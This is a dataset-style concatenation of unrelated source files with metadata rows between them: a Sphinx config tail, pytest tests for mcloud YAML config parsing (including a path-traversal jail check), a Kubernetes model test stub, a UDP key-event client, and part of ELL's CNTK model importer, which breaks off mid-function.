# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not None, a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
# The empty string is equivalent to '%b %d, %Y'.
#html_last_updated_fmt = None
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'h', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'r', 'sv', 'tr', 'zh'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# 'ja' uses this config value.
# 'zh' user can custom change `jieba` dictionary path.
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'PySCIPOptdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'PySCIPOpt.tex', 'PySCIPOpt Documentation',
'Matthias Miltenberger', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'pyscipopt', 'PySCIPOpt Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'PySCIPOpt', 'PySCIPOpt Documentation',
author, 'PySCIPOpt', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| 32.5 | 80 | 0.717321 |
13cb4ac0e47e4a5c8de3eb48db102ea357216456 | 12,238 | py | Python | tests/test_config.py | modera-manyrepo-packages/mcloud | 8ce3b1cc7bac01682a41c7b9d8d82f13a853d223 | [
"Apache-2.0"
] | null | null | null | tests/test_config.py | modera-manyrepo-packages/mcloud | 8ce3b1cc7bac01682a41c7b9d8d82f13a853d223 | [
"Apache-2.0"
] | null | null | null | tests/test_config.py | modera-manyrepo-packages/mcloud | 8ce3b1cc7bac01682a41c7b9d8d82f13a853d223 | [
"Apache-2.0"
] | null | null | null | from collections import OrderedDict
import os
from flexmock import flexmock
from mcloud.config import YamlConfig, Service, UnknownServiceError, ConfigParseError
from mcloud.container import PrebuiltImageBuilder, DockerfileImageBuilder, InlineDockerfileImageBuilder
import pytest
def test_not_existent_file():
    """A file path that does not exist is rejected at construction time."""
    pytest.raises(ValueError, YamlConfig, file='Not existent path')


def test_none_to_parser():
    """Constructing a YamlConfig with no source at all must not raise."""
    YamlConfig()
def test_load_config_prepare():
    """`extend` merges the parent service's settings, child keys winning."""
    parent = {
        'image': 'foo',
        'env': {'bar': 'baz'},
        'cmd': 'some',
    }
    child = {
        'extend': 'foo',
        'cmd': 'other',
    }

    processed = YamlConfig().prepare({'foo': parent, 'bar': child})

    assert processed['bar'] == {
        'image': 'foo',
        'env': {'bar': 'baz'},
        'cmd': 'other',
    }
def test_filter_env_non_dict():
    """Non-dict values pass through filter_env untouched."""
    assert YamlConfig(env='xx').filter_env('foo') == 'foo'


def test_filter_env_dict_no_env():
    """Dicts without a ~ key pass through, with values filtered recursively."""
    yc = YamlConfig(env='xx')
    flexmock(yc).should_call('filter_env').with_args({'foo': 'bar'}).once()
    flexmock(yc).should_call('filter_env').with_args('bar').once()
    assert yc.filter_env({'foo': 'bar'}) == {'foo': 'bar'}


def test_filter_env_remove():
    """A ~key that does not match the active env is dropped entirely."""
    assert YamlConfig(env='xx').filter_env({'~foo': 'bar'}) == {}


def test_filter_env_non_dict_in_match():
    """A matching ~key must wrap a dict; anything else is a TypeError."""
    yc = YamlConfig(env='foo')
    pytest.raises(TypeError, yc.filter_env, {'~foo': 'bar'})


def test_filter_env_keep():
    """A ~key matching the active env is unwrapped and filtered recursively."""
    yc = YamlConfig(env='foo')
    flexmock(yc).should_call('filter_env').with_args({'~foo': {'bar': 'baz'}}).once().and_return({'bar': 'baz'})
    flexmock(yc).should_call('filter_env').with_args({'bar': 'baz'}).once().and_return({'bar': 'baz'})
    flexmock(yc).should_call('filter_env').with_args('baz').once().and_return('baz')
    assert yc.filter_env({'~foo': {'bar': 'baz'}}) == {'bar': 'baz'}
def test_load_config_prepare_env():
    """prepare() delegates env-based filtering to filter_env()."""
    yc = YamlConfig(env='myenv')
    flexmock(yc).should_receive('filter_env').with_args({'foo': {'bar': 'baz'}}).once().and_return({'fas': {'bar': 'baz'}})

    processed = yc.prepare({'foo': {'bar': 'baz'}})

    assert processed == {'fas': {'bar': 'baz'}}


def test_load_config(tmpdir):
    """load() parses the yaml file, then runs prepare -> validate -> process."""
    p = tmpdir.join('mcloud.yml')
    p.write('foo: bar')
    config = YamlConfig(file=p.realpath(), app_name='myapp')
    flexmock(config).should_receive('prepare').with_args({'foo': 'bar'}).once().and_return({'foo': 'bar1'})
    flexmock(config).should_receive('validate').with_args({'foo': 'bar1'}).once()
    # process() receives the prepared config plus the load context args
    flexmock(config).should_receive('process').with_args(OrderedDict([('foo', 'bar1')]), path=None, app_name='myapp', client='booo').once()

    config.load(client='booo')


def test_load_config_from_config():
    """load() accepts an inline source string instead of a file."""
    config = YamlConfig(source='{"foo": "bar"}', app_name='myapp')
    flexmock(config).should_receive('prepare').with_args({'foo': 'bar'}).once().and_return({'foo': 'bar1'})
    flexmock(config).should_receive('validate').with_args({'foo': 'bar1'}).once()
    flexmock(config).should_receive('process').with_args(OrderedDict([('foo', 'bar1')]), path=None, app_name='myapp', client='booo').once()

    config.load(client='booo')


def test_load_config_not_valid(tmpdir):
    """A validation failure surfaces as ConfigParseError; process() never runs."""
    p = tmpdir.join('mcloud.yml')
    p.write('foo: bar')
    config = YamlConfig(file=p.realpath(), app_name='myapp')
    flexmock(config).should_receive('prepare').with_args({'foo': 'bar'}).once().and_return({'foo': 'bar1'})
    flexmock(config).should_receive('validate').with_args({'foo': 'bar1'}).once().and_raise(ValueError('boo'))
    # process() must never be reached when validation raises
    flexmock(config).should_receive('process').times(0)

    with pytest.raises(ConfigParseError):
        config.load()
@pytest.mark.parametrize("config", [
    # one service - image
    {
        'foo': {
            'image': 'boo'
        }
    },
    # one service - build
    {
        'foo': {
            'build': 'boo'
        }
    },
    # one service - full config
    {
        'foo': {
            'image': 'boo',
            'env': {
                'boo': 'baz',
                'boo2': 'baz',
                'boo3': 'baz',
            },
            'volumes': {
                'foo1': 'bar1',
                'foo2': 'bar2',
                'foo3': 'bar3',
            }
        },
    }
])
def test_validate_valid(config):
    """Every configuration above must be accepted by validate()."""
    c = YamlConfig()
    assert c.validate(config)
def test_validate_ordered_dict():
    """validate() accepts OrderedDict configs, as produced by yaml loading."""
    web_service = OrderedDict([
        ('image', 'orchardup/nginx'),
        ('volumes', OrderedDict([('public', '/var/www')])),
    ])
    assert YamlConfig().validate(OrderedDict([('web', web_service)]))
@pytest.mark.parametrize("config", [
    # no services
    {},
    # no image or build
    {'foo': {}},
    # some random key
    {
        'foo': {
            'build1': 'boo'
        }
    }
])
def test_validate_invalid(config):
    """Every configuration above must be rejected with a ValueError."""
    c = YamlConfig()
    with pytest.raises(ValueError):
        assert c.validate(config)
def test_process():
    """process() registers a Service per entry and runs every build step."""
    cfg = YamlConfig()
    flexmock(cfg)
    cfg.should_receive('process_image_build').once()
    cfg.should_receive('process_volumes_build').once()
    cfg.should_receive('process_command_build').once()

    cfg.process({'nginx': {'foo': 'bar'}}, path='foo')

    service = cfg.services['nginx']
    assert isinstance(service, Service)
    assert service.name == 'nginx'


def test_process_with_app_name():
    """With an app name, services are registered as "<service>.<app>"."""
    cfg = YamlConfig()
    flexmock(cfg)
    cfg.should_receive('process_image_build').once()
    cfg.should_receive('process_volumes_build').once()
    cfg.should_receive('process_command_build').once()

    cfg.process({'nginx': {'foo': 'bar'}}, path='foo', app_name='myapp')

    service = cfg.services['nginx.myapp']
    assert isinstance(service, Service)
    assert service.name == 'nginx.myapp'


def test_process_with_local_config():
    """The special "---" section is handed off to process_local_config()."""
    cfg = YamlConfig(source='{"nginx": {"image": "bar"}, "---": {"commands": {"bar": ["foo"]}}}')
    flexmock(cfg)
    cfg.should_receive('process_local_config').once().with_args({"commands": {"bar": ["foo"]}})
    cfg.load(process=False)


def test_process_local_config_hosts():
    """The "hosts" mapping from the local config is stored on the instance."""
    cfg = YamlConfig()
    cfg.process_local_config({'hosts': {'foo': 'bar'}})
    assert cfg.hosts == {'foo': 'bar'}
def test_process_local_config_commands():
    """Command help text may be embedded in the name as "name (help)"."""
    yc = YamlConfig()
    yc.process_local_config({'commands': {
        'push (Upload code to remove server)': ['sync . {host} --path ticcet/'],
        'pull': ['foo', 'bar']
    }})

    expected = {
        'push': {
            'help': 'Upload code to remove server',
            'commands': ['sync . {host} --path ticcet/']
        },
        'pull': {
            # no "(...)" suffix -> a default help string is generated
            'help': 'pull command',
            'commands': ['foo', 'bar']
        }
    }
    assert yc.get_commands() == expected
def test_build_command_empty():
    """A config without a "cmd" key leaves the command unset."""
    service = Service()
    YamlConfig().process_command_build(service, {}, '/base/path')
    assert service.command is None


def test_build_command_none():
    """An explicit null "cmd" leaves the command unset."""
    service = Service()
    YamlConfig().process_command_build(service, {'cmd': None}, '/base/path')
    assert service.command is None


def test_build_command_empty_string():
    """An empty "cmd" string leaves the command unset."""
    service = Service()
    YamlConfig().process_command_build(service, {'cmd': ''}, '/base/path')
    assert service.command is None


def test_build_command_ok():
    """A non-empty "cmd" string is stored verbatim."""
    service = Service()
    YamlConfig().process_command_build(service, {'cmd': 'ok --some args'}, '/base/path')
    assert service.command == 'ok --some args'
def test_build_build_volumes_empty():
    """An explicitly empty volume mapping produces no volumes."""
    service = Service()
    YamlConfig().process_volumes_build(service, {'volumes': []}, '/base/path')
    assert service.volumes == []


def test_build_build_volumes_none():
    """A config without a "volumes" key produces no volumes."""
    service = Service()
    YamlConfig().process_volumes_build(service, {}, '/base/path')
    assert service.volumes == []


def test_build_build_volumes_several(tmpdir):
    """Each relative local directory resolves to an absolute path mapping."""
    service = Service()
    dirs = {name: str(tmpdir.mkdir(name)) for name in ('foo1', 'foo2', 'foo3')}

    YamlConfig().process_volumes_build(service, {'volumes': {
        'foo1': 'bar1',
        'foo2': 'bar2',
        'foo3': 'bar3',
    }}, str(tmpdir))

    assert service.volumes == [
        {'local': dirs['foo1'], 'remote': 'bar1'},
        {'local': dirs['foo2'], 'remote': 'bar2'},
        {'local': dirs['foo3'], 'remote': 'bar3'},
    ]


def test_build_build_volumes_single_file(tmpdir):
    """A single file (not just a directory) can be mounted as a volume."""
    service = Service()
    tmpdir.join('nginx.conf').write('foo')

    YamlConfig().process_volumes_build(
        service, {'volumes': {'nginx.conf': 'bar1'}}, str(tmpdir))

    assert service.volumes == [
        {'local': str(tmpdir.join('nginx.conf')), 'remote': 'bar1'},
    ]


def test_build_build_volumes_basepath(tmpdir):
    """"." mounts the project base path itself."""
    service = Service()
    YamlConfig().process_volumes_build(
        service, {'volumes': {'.': 'bar1'}}, str(tmpdir))
    assert service.volumes == [{'local': str(tmpdir), 'remote': 'bar1'}]
@pytest.mark.parametrize("path,result", [
    ('/root', '/foo/root'),
    ('.', '/foo'),
    ('../', '/foo'),
    ('../bar/baz/../', '/foo/bar'),
    ('./././../', '/foo'),
    ('././some/crazy/something/../../..//../../../../../../../', '/foo'),
    ('~/', '/foo')
])
def test_build_build_volumes_hackish_paths(path, result):
    """Path traversal and home expansion must never escape the base path."""
    s = Service()
    c = YamlConfig()

    c.process_volumes_build(s, {'volumes': {
        path: 'bar',
    }}, '/foo')

    # the resolved local path is always jailed under the /foo base path
    assert s.volumes == [
        {'local': result, 'remote': 'bar'},
    ]
def test_build_build_env_empty():
    """An explicitly empty env produces an empty environment."""
    service = Service()
    YamlConfig().process_env_build(service, {'env': []}, '/base/path')
    assert service.env == {}


def test_build_build_env_none():
    """Without an "env" key only the implicit "env" name is injected."""
    service = Service()
    YamlConfig(env='dev').process_env_build(service, {}, '/base/path')
    assert service.env == {'env': 'dev'}


def test_build_build_env_several():
    """Configured variables are merged with the implicit "env" name."""
    service = Service()
    declared = {
        'foo1': 'bar1',
        'foo2': 'bar2',
        'foo3': 'bar3',
    }
    YamlConfig(env='prod').process_env_build(service, {'env': declared}, '/base/path')
    assert service.env == dict(declared, env='prod')
def test_build_image_image():
    """An "image" key selects a prebuilt image builder."""
    service = Service()
    YamlConfig().process_image_build(service, {'image': 'foo/bar'}, '/base/path')
    assert isinstance(service.image_builder, PrebuiltImageBuilder)
    assert service.image_builder.image == 'foo/bar'


def test_build_image_dockerfile():
    """A "build" key selects a Dockerfile build relative to the base path."""
    service = Service()
    YamlConfig().process_image_build(service, {'build': 'foo/bar'}, '/base/path')
    assert isinstance(service.image_builder, DockerfileImageBuilder)
    assert service.image_builder.path == '/base/path/foo/bar'


def test_build_inline_dockerfile():
    """A "dockerfile" key embeds the Dockerfile contents inline."""
    service = Service()
    dockerfile = 'FROM foo\nWORKDIR boo'
    YamlConfig().process_image_build(service, {'dockerfile': dockerfile}, '/base/path')
    assert isinstance(service.image_builder, InlineDockerfileImageBuilder)
    assert service.image_builder.files['Dockerfile'] == dockerfile


def test_build_image_dockerfile_no_path():
    """A "build" key cannot be resolved without a base path."""
    service = Service()
    config = YamlConfig()
    pytest.raises(ConfigParseError, config.process_image_build,
                  service, {'build': 'foo/bar'}, None)
def test_build_image_empty():
    """A service with neither "image", "build" nor "dockerfile" is invalid."""
    s = Service()
    c = YamlConfig()
    # The exception info captured via `as e` was never used; just assert the raise.
    with pytest.raises(ValueError):
        c.process_image_build(s, {}, '/base/path')
def test_get_service():
    """get_service() returns a registered service by name."""
    config = YamlConfig()
    config.services = {'foo': 'bar'}
    assert config.get_service('foo') == 'bar'


def test_get_service_no():
    """An unknown service name raises UnknownServiceError."""
    config = YamlConfig()
    config.services = {'foo': 'bar'}
    pytest.raises(UnknownServiceError, config.get_service, 'baz')


def test_hosts_config():
    """The first configured host is the default command host."""
    config = YamlConfig()
    config.hosts = OrderedDict((
        ('boo', 'app@somehost.com'),
        ('foo', 'app@other.com'),
    ))
    assert config.get_command_host() == 'app@somehost.com'
    assert config.get_command_host('boo') == 'app@somehost.com'
    assert config.get_command_host('foo') == 'app@other.com'
| 24.378486 | 139 | 0.576483 |
08fc71e38a1d22a22e5accfb0af79b6dba2d03f2 | 827 | py | Python | kubernetes/test/test_v1_job_status.py | jraby/kubernetes-client-python | e6e7b710d0b15fbde686bc9dccf00da5951bef84 | [
"Apache-2.0"
] | null | null | null | kubernetes/test/test_v1_job_status.py | jraby/kubernetes-client-python | e6e7b710d0b15fbde686bc9dccf00da5951bef84 | [
"Apache-2.0"
] | null | null | null | kubernetes/test/test_v1_job_status.py | jraby/kubernetes-client-python | e6e7b710d0b15fbde686bc9dccf00da5951bef84 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.7.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import kubernetes.client
from kubernetes.client.rest import ApiException
from kubernetes.client.models.v1_job_status import V1JobStatus
class TestV1JobStatus(unittest.TestCase):
    """ V1JobStatus unit test stubs """

    def setUp(self):
        # No per-test fixtures are needed for these generated stubs.
        pass

    def tearDown(self):
        # Nothing to clean up.
        pass

    def testV1JobStatus(self):
        """
        Test V1JobStatus

        Smoke test only: constructing the generated model must not raise.
        Attribute values are not exercised here.
        """
        model = kubernetes.client.models.v1_job_status.V1JobStatus()
if __name__ == '__main__':
    # Allow running this test module directly: python test_v1_job_status.py
    unittest.main()
| 19.232558 | 105 | 0.697703 |
844fe04c80108c09800725a81ab23f3ebc6f146c | 3,277 | py | Python | jagger/jagger/client.py | arruda/magic_it_up | 251a5cbd1fdebcea5a0150eec1367fd58b0da2d3 | [
"MIT"
] | null | null | null | jagger/jagger/client.py | arruda/magic_it_up | 251a5cbd1fdebcea5a0150eec1367fd58b0da2d3 | [
"MIT"
] | null | null | null | jagger/jagger/client.py | arruda/magic_it_up | 251a5cbd1fdebcea5a0150eec1367fd58b0da2d3 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import socket
import random
import logging
import time
from constants import MSG_DATE_SEP, END_MSG, ALLOWED_KEYS
logging.basicConfig(filename='jagger_client.log', level=logging.DEBUG)
logger = logging.getLogger("jagger_client")
def check_counter_and_skip(counter, skip_cicle=(1, 3)):
    """Advance ``counter`` by one and decide whether this tick is skipped.

    The skip decision is periodic: within every window of ``denominator``
    ticks, the first ``numerator`` ticks are skipped (i.e. skip when
    ``counter % denominator < numerator``).  ``counter == 0`` therefore
    always skips for any ``numerator >= 1``.

    To keep the counter from growing without bound, a counter above an
    internal maximum is folded back to its equivalent position inside the
    current cycle before being incremented.

    Returns a ``(new_counter, should_skip)`` pair.
    """
    numerator, denominator = skip_cicle
    position_in_window = counter % denominator
    skip_this_tick = position_in_window < numerator
    # Fold oversized counters back into the cycle to avoid unbounded growth.
    if counter > 10000000:
        counter = position_in_window
    return counter + 1, skip_this_tick
def prepare_msg(keys):
    """Serialise the pressed keys with a UTC timestamp.

    Format: ``<iso-utc-timestamp><MSG_DATE_SEP><concatenated keys>``.
    """
    timestamp = datetime.datetime.utcnow().isoformat()
    pressed = "".join(keys)
    return "{0}{1}{2}".format(timestamp, MSG_DATE_SEP, pressed)
def main_loop_controller(udp, dest, moves_proccessor, skip_cicle=(1, 4)):
    """Poll ``moves_proccessor`` forever and stream key states over UDP.

    Each message is built by :func:`prepare_msg`.  To limit traffic, a
    message identical to the previous one is re-sent at most once; further
    duplicates are suppressed (with a short sleep) until the key state
    changes.

    :param udp: a ``socket.socket`` (SOCK_DGRAM) to send from.
    :param dest: ``(host, port)`` tuple the datagrams are sent to.
    :param moves_proccessor: zero-argument callable returning the list of
        currently pressed keys.
    :param skip_cicle: kept for backward compatibility; the periodic skip
        logic that used it (``check_counter_and_skip``) is disabled.
    """
    num_resend_msgs = 0
    last_keys = None
    while True:
        keys = moves_proccessor()
        msg = prepare_msg(keys)
        should_skip = False
        if keys == last_keys:
            # Same state as last tick: allow exactly one resend, then skip
            # until the state changes.
            if num_resend_msgs >= 1:
                should_skip = True
            else:
                num_resend_msgs += 1
                time.sleep(0.005)
        else:
            num_resend_msgs = 0
        if should_skip:
            time.sleep(0.005)
            continue
        udp.sendto(msg.encode('UTF-8'), dest)
        # Lazy %-style args avoid formatting when debug logging is disabled.
        logger.debug("sent: %s", msg)
        last_keys = list(keys)
def default_moves_proccessor():
    """Fallback key provider: a random subset (0-2 keys) of ALLOWED_KEYS."""
    how_many = random.randint(0, 2)
    sampled = random.sample(ALLOWED_KEYS, how_many)
    time.sleep(0.1)
    return sampled
def run(host, port=8765, moves_proccessor=default_moves_proccessor):
    """Open a UDP socket to ``host``/``port`` and run the send loop.

    Any exception from the loop is logged; in every case an END_MSG
    datagram is sent and the socket is closed before returning.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    target = (host, port)
    try:
        main_loop_controller(sock, target, moves_proccessor)
    except Exception as error:
        logger.exception(error)
    finally:
        sock.sendto(END_MSG.encode('UTF-8'), target)
        sock.close()
if __name__ == '__main__':
    import sys
    # First CLI argument is the server host to stream key events to.
    host = sys.argv[1]
    run(host)
| 29.258929 | 77 | 0.632896 |
77552639a41ff4d7c8ffa74a25a5b9b0995071f9 | 25 | py | Python | controller/__init__.py | hotpoor-for-Liwei/hj_hackathon_201607 | 7ef326a733f88e9a02961a5b467b9109e5b375b9 | [
"MIT"
] | 1 | 2021-12-21T10:42:46.000Z | 2021-12-21T10:42:46.000Z | www_local/controller/__init__.py | 2218084076/hotpoor_autoclick_xhs | a52446ba691ac19e43410a465dc63f940c0e444d | [
"Apache-2.0"
] | 1 | 2016-08-03T06:11:08.000Z | 2016-08-03T06:11:08.000Z | www_local/controller/__init__.py | 2218084076/hotpoor_autoclick_xhs | a52446ba691ac19e43410a465dc63f940c0e444d | [
"Apache-2.0"
] | 2 | 2019-11-13T06:11:25.000Z | 2020-03-13T06:19:00.000Z | # -*- encoding: utf8 -*-
| 12.5 | 24 | 0.48 |
6af8cc2b510b0b061b74b1a3b8db9e6d8ccf1c8e | 26,910 | py | Python | tools/importers/CNTK/cntk_to_ell.py | n-gineer/ELL | 2e5b93fe13993073a9486fc8720359ae4a49f737 | [
"MIT"
] | 2,094 | 2016-09-28T05:55:24.000Z | 2019-05-04T19:06:36.000Z | tools/importers/CNTK/cntk_to_ell.py | n-gineer/ELL | 2e5b93fe13993073a9486fc8720359ae4a49f737 | [
"MIT"
] | 213 | 2017-06-30T12:53:40.000Z | 2019-05-03T06:35:38.000Z | tools/importers/CNTK/cntk_to_ell.py | n-gineer/ELL | 2e5b93fe13993073a9486fc8720359ae4a49f737 | [
"MIT"
] | 301 | 2017-03-24T08:40:00.000Z | 2019-05-02T21:22:28.000Z | ####################################################################################################
#
# Project: Embedded Learning Library (ELL)
# File: cntk_to_ell.py (importers)
# Authors: Byron Changuion
#
# Requires: Python 3.x, cntk-2.4
#
####################################################################################################
import sys
import os
import math
import time
import numpy as np
from cntk import load_model
from cntk.ops import softmax
# Make the sibling lib/, the shared importer common/ directory and the
# repository python utilities importable regardless of the current
# working directory.
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__))))
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'lib'))
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../common'))
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../../utilities/pythonlibs'))
import find_ell # noqa 401
import ell
import logger
from cntk_converters import *
import cntk_layers as cntk_layers
import cntk_utilities as cntk_utilities
import common.importer
import common.memory_shapes as memory_shapes
#
# Mapping of CNTK operation type to the converter object to use.
# For each entry:
# key - the name of the CNTK operation (the op_name of the node)
# value - converter class to use, or,
# tuple(converter_class, weight_mapping, operation_type)
# When a tuple is used, the convert class is initialized with:
# converter_type(weight_mapping, operation_type)
# or,
# converter_type(weight_mapping)
# if operation_type is missing.
# e.g.
# cntk_converter_map =
# {
# "Activation" = CntkStandardConverter
# "AveragePooling" = CntkPoolingConverter
# "BatchNormalization" = (CntkStandardConverter,{"mean": 3, "variance": 4, "count": 5, "scale": 0, "bias": 1})
# ...
# }
# For "Activation":
# - the CntkStandardConverter will be used to create an ImporterNode with
# operation_type "Activation"
# - standard inputs, outputs, input/output shapes etc. derived from CNTK node
# inputs/outputs.
# For "AveragePooling":
# - the CntkPoolingConverter class will be used to create the corresponding ImporterNode
# For "BatchNormalization":
# - the CntkStandardConverter will create an ImporterNode with
# operation_type "BatchNormalization"
# - standard inputs, outputs, input/output shapes etc. derived from CNTK node
# inputs/outputs.
# - Weights will be retrieved from the inputs, with "mean" coming from index 3,
# "variance from index 4" etc.
#
# Keys are CNTK op_names; values are either a converter class, or a tuple of
# (converter class, weight mapping[, operation type]) -- see the block
# comment above for the meaning of each form.
cntk_converter_map = {
    "Activation": CntkStandardConverter,
    "AveragePooling": CntkPoolingConverter,
    "BatchNormalization": (CntkStandardConverter, {"mean": (2, "aggregate_mean", "channel"),
                                                   "variance": (3, "aggregate_variance", "channel"),
                                                   "count": (4, "aggregate_count", "channel"),
                                                   "scale": (0, "scale", "channel"),
                                                   "bias": (1, "bias", "channel")}),
    "ClassificationError": (CntkStandardConverter, {}, "Skip"),
    "Combine": (CntkStandardConverter, {}, "Skip"),
    "Convolution": CntkConvolutionConverter,
    "CrossEntropyWithSoftmax": CntkCrossEntropyWithSoftmaxConverter,
    "Dense": CntkDenseConverter,
    "Dropout": (CntkStandardConverter, {}, "Passthrough"),
    "ElementTimes": CntkElementTimesConverter,
    "Input": CntkInputConverter,
    "linear": CntkDenseConverter,
    "MaxPooling": CntkPoolingConverter,
    "Minus": (CntkStandardConverter, {"bias": (1, "channel")}),
    "Plus": CntkPlusConverter,
    "PReLU": (CntkStandardConverter, {"alpha": (0, "prelu", "channel_row_column")}, "PReLU"),
    "ReduceElements": (CntkStandardConverter, {}, "Skip"),
    "ReLU": (CntkStandardConverter, {}, "ReLU"),
    "Reshape": CntkReshapeConverter,
    "Softmax": CntkStandardConverter,
    "Splice": CntkSpliceConverter,
    "UserFunction": CntkUserFunctionConverter,
}
def import_nodes(cntk_nodes):
    """Build a common.importer.ImporterModel from a list of CNTK nodes.

    Nodes for which no converter is registered are silently skipped.
    """
    model = common.importer.ImporterModel()
    for cntk_node in cntk_nodes:
        converter = CntkConverterFactory.get_converter(cntk_node, cntk_converter_map)
        if not converter:
            continue
        model.add_node(converter.uid, converter.convert())
        # Register each weight tensor: (name, value, order) triples.
        for weight_name in converter.weights:
            entry = converter.weights[weight_name]
            model.add_tensor(entry[0], entry[1], entry[2])
    return model
def predictor_from_cntk_model(modelFile, plotModel=False):
    """Loads a CNTK model and returns an ell.neural.NeuralNetworkPredictor"""
    _logger = logger.get()
    _logger.info("Loading...")
    cntk_model = load_model(modelFile)
    _logger.info("\nFinished loading.")
    if plotModel:
        svg_path = os.path.join(os.path.dirname(modelFile), os.path.basename(modelFile) + ".svg")
        cntk_utilities.plot_model(cntk_model, svg_path)
    _logger.info("Pre-processing...")
    all_layers = cntk_utilities.get_model_layers(cntk_model)
    # Keep only the CNTK layers that have an ELL equivalent.
    relevant_layers = cntk_layers.get_filtered_layers_list(all_layers)
    _logger.info("\nFinished pre-processing.")
    try:
        # Convert the filtered CNTK layers and wrap them in a predictor.
        ell_layer_list = cntk_layers.convert_cntk_layers_to_ell_layers(relevant_layers)
        return ell.neural.NeuralNetworkPredictor(ell_layer_list)
    except BaseException as exception:
        _logger.error("Error occurred attempting to convert cntk layers to ELL layers: " + str(exception))
        raise exception
def predictor_from_cntk_model_using_new_engine(modelFile, plotModel=True):
    """
    Loads a CNTK model and returns an ell.neural.NeuralNetworkPredictor
    """
    _logger = logger.get()
    _logger.info("Loading...")
    cntk_model = load_model(modelFile)
    _logger.info("\nFinished loading.")
    if plotModel:
        svg_path = os.path.join(os.path.dirname(modelFile), os.path.basename(modelFile) + ".svg")
        cntk_utilities.plot_model(cntk_model, svg_path)
    try:
        _logger.info("Pre-processing...")
        relevant_nodes = cntk_utilities.Utilities.get_model_nodes(cntk_model)
        _logger.info("\nFinished pre-processing.")
        # Convert via the shared importer engine rather than the legacy
        # layer-by-layer path.
        importer_model = import_nodes(relevant_nodes)
        engine = common.importer.ImporterEngine()
        ell_layer_list = engine.convert(importer_model)
        return ell.neural.NeuralNetworkPredictor(ell_layer_list)
    except BaseException as exception:
        _logger.error("Error occurred attempting to convert cntk layers to ELL layers: " + str(exception))
        raise exception
def get_node_output_in_ell_order(cntk_node_results):
    """Reorder a CNTK result tensor into ELL's (row, column, channel) layout.

    CNTK emits results channel-first (with an optional extra leading
    filter dimension for 4-D results); ELL expects row-major
    (row, column, channel).  1-D vectors become a (1, 1, n) tensor.

    Fix: ``np.float`` (an alias of the builtin ``float``, i.e. float64)
    was removed in NumPy 1.24 and raised AttributeError; it is replaced
    by the equivalent ``np.float64``.

    :param cntk_node_results: numpy array with 1 to 4 dimensions.
    :return: float64 numpy array of shape (rows, columns, channels).
    :raises NotImplementedError: for tensors of more than 4 dimensions.
    """
    ordered_weights = cntk_node_results
    original_shape = ordered_weights.shape
    if len(original_shape) == 4:
        # Fold the leading (filter, channel) pair into a single channel axis.
        ordered_weights = ordered_weights.reshape(original_shape[0] * original_shape[1],
                                                  original_shape[2], original_shape[3])
        original_shape = ordered_weights.shape
    if len(original_shape) == 3:
        # (channel, row, column) -> (row, column, channel)
        ordered_weights = np.moveaxis(ordered_weights, 0, -1)
        ordered_weights = ordered_weights.ravel().astype(np.float64).reshape(
            original_shape[1], original_shape[2], original_shape[0])
